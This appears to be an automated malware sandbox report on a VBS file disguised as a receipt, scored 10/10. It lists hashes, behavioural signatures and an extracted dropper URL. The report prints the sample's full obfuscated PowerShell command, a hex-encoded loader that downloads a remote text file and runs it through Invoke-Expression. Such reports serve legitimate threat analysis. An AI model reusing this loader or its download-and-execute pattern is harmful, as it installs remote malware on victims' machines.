Analysis
-
max time kernel
140s -
max time network
141s -
platform
windows7_x64 -
resource
win7-en -
submitted
07-09-2021 14:32
Static task
static1
Behavioral task
behavioral1
Sample
Receipt_12203.vbs
Resource
win7-en
windows7_x64
0 signatures
0 seconds
Behavioral task
behavioral2
Sample
Receipt_12203.vbs
Resource
win10v20210408
windows10_x64
0 signatures
0 seconds
General
-
Target
Receipt_12203.vbs
-
Size
1KB
-
MD5
aa2957c1912b583d18c3fad0a1dbe455
-
SHA1
4b2ae1f0381d72b3833ab341cc3862b540359c64
-
SHA256
2f70c208c08b5607dda4932a3d29625a52d84aa66c916ce8a867a0c2c57ffc5b
-
SHA512
668b3c2be0f926e314bd5b810f79d0b7eac4fcd760108629cfff334c5f5dc0d66ea95f5d04fd47d09b4d910d1dfda1b1a405c008b3be24f420a4155371113a7a
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
exe.dropper
http://transfer.sh/get/dIj4XJ/bypass.txt
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid process 1772 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1772 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
Processes:
WScript.exedescription pid process target process PID 1664 wrote to memory of 1772 1664 WScript.exe powershell.exe PID 1664 wrote to memory of 1772 1664 WScript.exe powershell.exe PID 1664 wrote to memory of 1772 1664 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Receipt_12203.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://transferXXXsh/get/dIj4XJ/bypassXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/1664-52-0x000007FEFB591000-0x000007FEFB593000-memory.dmpFilesize
8KB
-
memory/1772-53-0x0000000000000000-mapping.dmp
-
memory/1772-55-0x000007FEF28E0000-0x000007FEF343D000-memory.dmpFilesize
11.4MB
-
memory/1772-56-0x00000000027E0000-0x00000000027E2000-memory.dmpFilesize
8KB
-
memory/1772-58-0x00000000027E4000-0x00000000027E7000-memory.dmpFilesize
12KB
-
memory/1772-57-0x00000000027E2000-0x00000000027E4000-memory.dmpFilesize
8KB
-
memory/1772-59-0x00000000027EB000-0x000000000280A000-memory.dmpFilesize
124KB